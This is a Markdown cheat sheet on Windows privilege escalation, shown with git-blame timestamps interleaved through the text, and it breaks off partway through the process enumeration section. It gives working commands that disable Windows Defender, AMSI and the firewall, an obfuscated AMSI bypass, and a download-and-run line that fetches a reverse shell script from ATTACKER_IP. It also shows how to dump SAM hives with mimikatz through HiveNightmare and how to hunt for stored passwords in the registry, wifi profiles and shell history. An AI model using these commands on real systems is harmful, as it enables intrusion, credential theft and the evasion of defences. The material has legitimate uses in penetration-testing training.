2018-05-20 20:10:33 +00:00
# Windows - Privilege Escalation
2019-03-03 19:01:25 +00:00
## Summary
* [Tools ](#tools )
2019-03-03 19:05:27 +00:00
* [Windows Version and Configuration ](#windows-version-and-configuration )
* [User Enumeration ](#user-enumeration )
* [Network Enumeration ](#network-enumeration )
2020-05-16 11:22:55 +00:00
* [Antivirus & Detections ](#antivirus--detections )
* [Windows Defender ](#windows-defender )
2021-04-21 20:27:07 +00:00
* [Firewall ](#firewall )
2020-05-16 11:22:55 +00:00
* [AppLocker Enumeration ](#applocker-enumeration )
* [Powershell ](#powershell )
* [Default Writeable Folders ](#default-writeable-folders )
2019-03-03 19:05:27 +00:00
* [EoP - Looting for passwords ](#eop---looting-for-passwords )
2019-11-07 22:21:00 +00:00
* [SAM and SYSTEM files ](#sam-and-system-files )
2022-03-05 17:31:15 +00:00
* [LAPS Settings ](#laps-settings )
2021-07-26 19:25:56 +00:00
* [HiveNightmare ](#hivenightmare )
2019-11-07 22:21:00 +00:00
* [Search for file contents ](#search-for-file-contents )
* [Search for a file with a certain filename ](#search-for-a-file-with-a-certain-filename )
* [Search the registry for key names and passwords ](#search-the-registry-for-key-names-and-passwords )
2020-03-22 19:25:35 +00:00
* [Passwords in unattend.xml ](#passwords-in-unattendxml )
2019-11-07 22:21:00 +00:00
* [Wifi passwords ](#wifi-passwords )
2020-10-16 09:35:15 +00:00
* [Sticky Notes passwords ](#sticky-notes-passwords )
2019-11-07 22:21:00 +00:00
* [Passwords stored in services ](#passwords-stored-in-services )
2022-04-24 13:01:18 +00:00
* [Passwords stored in Key Manager ](#passwords-stored-in-key-manager )
2021-05-06 16:26:00 +00:00
* [Powershell History ](#powershell-history )
* [Powershell Transcript ](#powershell-transcript )
2021-01-13 09:22:59 +00:00
* [Password in Alternate Data Stream ](#password-in-alternate-data-stream )
2019-03-03 19:05:27 +00:00
* [EoP - Processes Enumeration and Tasks ](#eop---processes-enumeration-and-tasks )
* [EoP - Incorrect permissions in services ](#eop---incorrect-permissions-in-services )
* [EoP - Windows Subsystem for Linux (WSL) ](#eop---windows-subsystem-for-linux-wsl )
* [EoP - Unquoted Service Paths ](#eop---unquoted-service-paths )
2021-07-26 19:25:56 +00:00
* [EoP - $PATH Interception ](#eop---path-interception )
2020-02-01 21:12:36 +00:00
* [EoP - Named Pipes ](#eop---named-pipes )
2019-03-03 19:05:27 +00:00
* [EoP - Kernel Exploitation ](#eop---kernel-exploitation )
2019-03-04 18:40:34 +00:00
* [EoP - AlwaysInstallElevated ](#eop---alwaysinstallelevated )
2019-03-03 19:05:27 +00:00
* [EoP - Insecure GUI apps ](#eop---insecure-gui-apps )
2020-05-28 09:19:16 +00:00
* [EoP - Evaluating Vulnerable Drivers ](#eop---evaluating-vulnerable-drivers )
2021-09-06 18:58:44 +00:00
* [EoP - Printers ](#eop---printers )
2021-08-10 21:00:19 +00:00
* [Universal Printer ](#universal-printer )
* [Bring Your Own Vulnerability ](#bring-your-own-vulnerability )
2019-03-03 19:05:27 +00:00
* [EoP - Runas ](#eop---runas )
2020-05-03 14:28:17 +00:00
* [EoP - Abusing Shadow Copies ](#eop---abusing-shadow-copies )
2019-07-25 12:08:32 +00:00
* [EoP - From local administrator to NT SYSTEM ](#eop---from-local-administrator-to-nt-system )
2019-07-22 19:45:50 +00:00
* [EoP - Living Off The Land Binaries and Scripts ](#eop---living-off-the-land-binaries-and-scripts )
2019-07-26 13:29:34 +00:00
* [EoP - Impersonation Privileges ](#eop---impersonation-privileges )
2021-08-10 21:00:19 +00:00
* [Restore A Service Account's Privileges ](#restore-a-service-accounts-privileges )
* [Meterpreter getsystem and alternatives ](#meterpreter-getsystem-and-alternatives )
* [RottenPotato (Token Impersonation) ](#rottenpotato-token-impersonation )
* [Juicy Potato (Abusing the golden privileges) ](#juicy-potato-abusing-the-golden-privileges )
* [Rogue Potato (Fake OXID Resolver) ](#rogue-potato-fake-oxid-resolver ))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw) ](#efspotato-ms-efsr-efsrpcopenfileraw ))
2020-10-08 14:39:25 +00:00
* [EoP - Privileged File Write ](#eop---privileged-file-write )
* [DiagHub ](#diaghub )
* [UsoDLLLoader ](#usodllloader )
* [WerTrigger ](#wertrigger )
2019-06-29 17:23:34 +00:00
* [EoP - Common Vulnerabilities and Exposures ](#eop---common-vulnerabilities-and-exposure )
2021-08-10 21:00:19 +00:00
* [MS08-067 (NetAPI) ](#ms08-067-netapi )
* [MS10-015 (KiTrap0D) ](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7 )
* [MS11-080 (adf.sys) ](#ms11-080-afd.sys---microsoft-windows-xp-2003 )
* [MS15-051 (Client Copy Image) ](#ms15-051---microsoft-windows-2003--2008--7--8--2012 )
* [MS16-032 ](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64 )
* [MS17-010 (Eternal Blue) ](#ms17-010-eternal-blue )
* [CVE-2019-1388 ](#cve-2019-1388 )
2021-01-28 19:45:54 +00:00
* [EoP - $PATH Interception ](#eop---path-interception )
2019-07-26 13:29:34 +00:00
* [References ](#references )
2019-03-03 19:01:25 +00:00
2018-12-25 14:51:11 +00:00
## Tools
2019-06-23 22:21:39 +00:00
- [PowerSploit's PowerUp ](https://github.com/PowerShellMafia/PowerSploit )
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
2018-12-25 14:51:11 +00:00
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock ](https://github.com/rasta-mouse/Watson )
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities ](https://github.com/rasta-mouse/Sherlock )
2019-06-09 14:05:44 +00:00
```powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
```
2018-12-25 14:51:11 +00:00
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac ](https://github.com/AlessandroZ/BeRoot )
- [Windows-Exploit-Suggester ](https://github.com/GDSSecurity/Windows-Exploit-Suggester )
2019-03-03 19:01:25 +00:00
```powershell
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
```
2019-01-07 17:15:45 +00:00
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems ](https://github.com/pentestmonkey/windows-privesc-check )
2019-03-24 15:00:27 +00:00
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated. ](https://github.com/abatchy17/WindowsExploits )
2019-06-16 21:45:52 +00:00
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script. ](https://github.com/absolomb/WindowsEnum )
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. ](https://github.com/GhostPack/Seatbelt )
2020-05-28 09:19:16 +00:00
```powershell
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"
Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""
```
2019-01-27 18:13:06 +00:00
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind ](https://github.com/M4ximuss/Powerless )
2019-06-16 21:45:52 +00:00
- [JAWS - Just Another Windows (Enum) Script ](https://github.com/411Hall/JAWS )
```powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
```
2020-10-29 10:57:40 +00:00
- [winPEAS - Windows Privilege Escalation Awesome Script ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe )
2021-02-10 14:52:41 +00:00
- [Windows Exploit Suggester - Next Generation (WES-NG) ](https://github.com/bitsadmin/wesng )
```powershell
# First obtain systeminfo
systeminfo
systeminfo > systeminfo.txt
# Then feed it to wesng
python3 wes.py --update-wes
python3 wes.py --update
python3 wes.py systeminfo.txt
```
2021-04-21 20:27:07 +00:00
- [PrivescCheck - Privilege Escalation Enumeration Script for Windows ](https://github.com/itm4n/PrivescCheck )
```powershell
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
2021-05-06 16:26:00 +00:00
C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML"
2021-04-21 20:27:07 +00:00
```
2018-12-25 14:51:11 +00:00
2018-05-20 20:10:33 +00:00
## Windows Version and Configuration
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
2019-03-03 19:01:25 +00:00
```
Extract patchs and updates
```powershell
2018-12-25 14:19:45 +00:00
wmic qfe
2018-05-20 20:10:33 +00:00
```
Architecture
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
List all env variables
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
set
2018-12-25 14:19:45 +00:00
Get-ChildItem Env: | ft Key,Value
2018-05-20 20:10:33 +00:00
```
List all drives
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
2018-12-25 14:19:45 +00:00
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
2018-05-20 20:10:33 +00:00
```
## User Enumeration
Get current username
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
echo %USERNAME% || whoami
2018-12-25 14:19:45 +00:00
$env:username
```
List user privilege
```powershell
whoami /priv
2020-02-13 21:53:45 +00:00
whoami /groups
2018-05-20 20:10:33 +00:00
```
List all users
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net user
whoami /all
2018-12-25 14:19:45 +00:00
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
2018-05-20 20:10:33 +00:00
```
List logon requirements; useable for bruteforcing
2018-08-12 21:30:22 +00:00
2018-12-25 14:19:45 +00:00
```powershell$env:usernadsc
2018-05-20 20:10:33 +00:00
net accounts
```
Get details about a user (i.e. administrator, admin, current user)
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net localgroup
2018-12-25 14:19:45 +00:00
Get-LocalGroup | ft Name
2018-05-20 20:10:33 +00:00
```
Get details about a group (i.e. administrators)
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net localgroup administrators
2018-12-25 14:19:45 +00:00
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
2018-05-20 20:10:33 +00:00
```
2021-04-21 20:27:07 +00:00
Get Domain Controllers
```powershell
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
```
2018-05-20 20:10:33 +00:00
## Network Enumeration
2018-12-25 14:19:45 +00:00
List all network interfaces, IP, and DNS.
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
ipconfig /all
2018-12-25 14:19:45 +00:00
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
2018-05-20 20:10:33 +00:00
```
List current routing table
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
route print
2018-12-25 14:19:45 +00:00
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
2018-05-20 20:10:33 +00:00
```
List the ARP table
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
arp -A
2018-12-25 14:19:45 +00:00
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
2018-05-20 20:10:33 +00:00
```
List all current connections
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
netstat -ano
```
List all network shares
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
net share
2021-03-24 11:44:35 +00:00
powershell Find-DomainShare -ComputerDomain domain.local
2018-05-20 20:10:33 +00:00
```
2018-12-25 14:19:45 +00:00
SNMP Configuration
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
2020-05-16 11:22:55 +00:00
## Antivirus & Detections
2021-03-24 21:26:23 +00:00
Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName`
2020-05-16 11:22:55 +00:00
### Windows Defender
```powershell
# check status of Defender
PS C:\> Get-MpComputerStatus
2021-04-21 20:27:07 +00:00
# disable scanning all downloaded files and attachments, disable AMSI (reactive)
2020-05-16 11:22:55 +00:00
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
2020-12-08 13:31:01 +00:00
PS C:\> Set-MpPreference -DisableIOAVProtection $true
2021-03-24 21:26:23 +00:00
# disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1
# exclude a folder
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
2021-04-21 20:27:07 +00:00
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
# remove signatures (if Internet connection is present, they will be downloaded again):
2021-11-06 18:14:47 +00:00
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2021-04-21 20:27:07 +00:00
```
### Firewall
List firewall state and current configuration
```powershell
netsh advfirewall firewall dump
# or
netsh firewall show state
netsh firewall show config
2020-05-16 11:22:55 +00:00
```
2021-04-21 20:27:07 +00:00
List firewall's blocked ports
```powershell
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
```
Disable firewall
```powershell
# Disable Firewall on Windows 7 via cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Disable Firewall on Windows 7 via Powershell
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" – Value'`
# Disable Firewall on any windows via cmd
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
```
2020-05-16 11:22:55 +00:00
### AppLocker Enumeration
2020-01-06 22:03:54 +00:00
- With the GPO
2022-05-31 09:57:44 +00:00
- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
2020-05-16 11:22:55 +00:00
2021-04-21 20:27:07 +00:00
* List AppLocker rules
```powershell
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```
2022-05-31 09:57:44 +00:00
* AppLocker Bypass
* By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
2021-04-21 20:27:07 +00:00
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
2020-05-16 11:22:55 +00:00
### Powershell
Default powershell locations in a Windows system.
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
2022-05-31 09:57:44 +00:00
#### Powershell Constrained Mode
2021-04-21 20:27:07 +00:00
2022-05-31 09:57:44 +00:00
* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
* [bypass-clm - PowerShell Constrained Language Mode Bypass ](https://github.com/calebstewart/bypass-clm )
* [PowerShdll - Powershell with no Powershell.exe via DLL's ](https://github.com/p3nt4/PowerShdll ): `rundll32.exe C:\temp\PowerShdll.dll,main`
* Other bypasses
```powershell
PS > & { whoami }
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
```
2021-04-21 20:27:07 +00:00
2022-05-31 09:57:44 +00:00
#### AMSI Bypass
2021-04-21 20:27:07 +00:00
2022-05-31 09:57:44 +00:00
Find more AMSI bypass: [here ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md )
2020-05-16 11:22:55 +00:00
```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```
### Default Writeable Folders
```powershell
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
2022-05-31 09:57:44 +00:00
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
2021-04-21 20:27:07 +00:00
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
2022-05-31 09:57:44 +00:00
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
2020-05-16 11:22:55 +00:00
```
2019-03-03 19:01:25 +00:00
## EoP - Looting for passwords
2018-05-20 20:10:33 +00:00
2018-12-25 14:19:45 +00:00
### SAM and SYSTEM files
2019-07-01 21:29:29 +00:00
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
2018-12-25 14:19:45 +00:00
```powershell
2019-07-01 21:29:29 +00:00
# Usually %SYSTEMROOT% = C:\Windows
2018-12-25 14:19:45 +00:00
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
2019-07-01 21:29:29 +00:00
Generate a hash file for John using `pwdump` or `samdump2` .
```powershell
pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt
```
2022-05-25 08:09:09 +00:00
Either crack it with `john -format=NT /root/sam.txt` , [hashcat ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat ) or use Pass-The-Hash.
2021-07-26 19:25:56 +00:00
2022-03-05 17:31:15 +00:00
### LAPS Settings
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
* LAPS Enabled: AdmPwdEnabled
* LAPS Admin Account Name: AdminAccountName
* LAPS Password Complexity: PasswordComplexity
* LAPS Password Length: PasswordLength
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
2021-07-26 19:25:56 +00:00
### HiveNightmare
> CVE-2021– 36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user
Check for the vulnerability using `icacls`
```powershell
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX) < -- this is wrong - regular users should not have read access !
```
Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
```powershell
mimikatz> token::whoami /full
# List shadow copies available
mimikatz> misc::shadowcopies
# Extract account from SAM databases
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
# Extract secrets from SECURITY
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```
2019-07-01 21:29:29 +00:00
2019-03-03 19:01:25 +00:00
### Search for file contents
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
cd C:\ & findstr /SI /M "password" *.xml * .ini *.txt
2018-12-25 14:19:45 +00:00
findstr /si password *.xml * .ini *.txt * .config
2019-03-03 19:01:25 +00:00
findstr /spin "password" *.*
2018-05-20 20:10:33 +00:00
```
2018-07-08 18:03:40 +00:00
### Search for a file with a certain filename
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
dir /S /B *pass* .txt == *pass* .xml == *pass* .ini == *cred* == *vnc* == *.config*
2019-04-14 17:46:34 +00:00
where /R C:\ user.txt
where /R C:\ *.ini
2018-05-20 20:10:33 +00:00
```
2019-03-03 19:01:25 +00:00
### Search the registry for key names and passwords
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
2019-03-03 19:01:25 +00:00
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
2019-04-02 20:43:44 +00:00
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
2019-03-03 19:01:25 +00:00
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
2018-05-20 20:10:33 +00:00
```
2018-07-08 18:03:40 +00:00
### Read a value of a certain sub key
2018-08-12 21:30:22 +00:00
2018-05-20 20:10:33 +00:00
```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```
2018-12-22 23:45:45 +00:00
### Passwords in unattend.xml
2018-08-12 21:30:22 +00:00
2019-06-09 22:05:47 +00:00
Location of the unattend.xml files.
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```powershell
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
2018-07-08 18:03:40 +00:00
2019-06-29 17:23:34 +00:00
Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul` .
2018-07-08 18:03:40 +00:00
Example content
2018-08-12 21:30:22 +00:00
2018-05-27 20:27:31 +00:00
```powershell
2018-08-12 21:30:22 +00:00
< component name = "Microsoft-Windows-Shell-Setup" publicKeyToken = "31bf3856ad364e35" language = "neutral" versionScope = "nonSxS" processorArchitecture = "amd64" >
2018-05-27 20:27:31 +00:00
< AutoLogon >
2019-06-09 22:05:47 +00:00
< Password > U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==< / Password >
2018-08-12 21:30:22 +00:00
< Enabled > true< / Enabled >
< Username > Administrateur< / Username >
2018-05-27 20:27:31 +00:00
< / AutoLogon >
< UserAccounts >
< LocalAccounts >
< LocalAccount wcm:action = "add" >
< Password > *SENSITIVE*DATA*DELETED*< / Password >
< Group > administrators;users< / Group >
< Name > Administrateur< / Name >
< / LocalAccount >
< / LocalAccounts >
< / UserAccounts >
```
2018-08-12 21:30:22 +00:00
2019-06-09 22:05:47 +00:00
Unattend credentials are stored in base64 and can be decoded manually with base64.
```powershell
$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
SecretSecurePassword1234*
```
2018-05-27 20:27:31 +00:00
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
2018-12-25 14:19:45 +00:00
### IIS Web config
```powershell
Get-Childitem – Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
2018-12-25 14:51:11 +00:00
```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
```
2019-01-28 19:27:45 +00:00
### Other files
```bat
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
2020-12-08 13:31:01 +00:00
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
2019-03-03 19:01:25 +00:00
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
2019-01-28 19:27:45 +00:00
```
### Wifi passwords
Find AP SSID
```bat
netsh wlan show profile
```
Get Cleartext Pass
```bat
netsh wlan show profile < SSID > key=clear
```
2019-03-03 15:31:17 +00:00
Oneliner method to extract wifi passwords from all the access point.
2019-03-03 19:01:25 +00:00
```batch
2019-03-03 15:31:17 +00:00
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```
2020-10-16 09:35:15 +00:00
### Sticky Notes passwords
The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`
2019-05-15 19:55:17 +00:00
### Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher ](https://github.com/Arvanaghi/SessionGopher )
```powershell
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
```
2022-04-24 13:01:18 +00:00
### Passwords stored in Key Manager
:warning: This software will display its output in a GUI
```ps1
rundll32 keymgr,KRShowKeyMgr
```
2021-05-06 16:26:00 +00:00
### Powershell History
2019-11-07 22:21:00 +00:00
2021-07-12 18:45:16 +00:00
Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing` .
2019-11-07 22:21:00 +00:00
```powershell
2020-08-09 10:15:56 +00:00
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
2019-11-07 22:21:00 +00:00
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
2020-01-02 22:33:04 +00:00
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
2019-11-07 22:21:00 +00:00
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```
2019-05-15 19:55:17 +00:00
2021-05-06 16:26:00 +00:00
### Powershell Transcript
```xml
C:\Users\<USERNAME>\Documents\PowerShell_transcript.< HOSTNAME > .< RANDOM > .< TIMESTAMP > .txt
C:\Transcripts\<DATE>\PowerShell_transcript.< HOSTNAME > .< RANDOM > .< TIMESTAMP > .txt
```
2021-01-13 09:22:59 +00:00
### Password in Alternate Data Stream
```ps1
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
```
2019-03-03 19:01:25 +00:00
## EoP - Processes Enumeration and Tasks
2018-08-12 21:30:22 +00:00
2021-05-06 16:26:00 +00:00
* What processes are running?
```powershell
tasklist /v
net start
sc query
Get-Service
Get-Process
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost* "} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```
2018-12-25 14:19:45 +00:00
2021-05-06 16:26:00 +00:00
* Which processes are running as "system"
```powershell
tasklist /v /fi "username eq system"
```
2019-03-03 19:01:25 +00:00
2021-05-06 16:26:00 +00:00
* Do you have powershell magic?
```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```
2019-03-03 19:01:25 +00:00
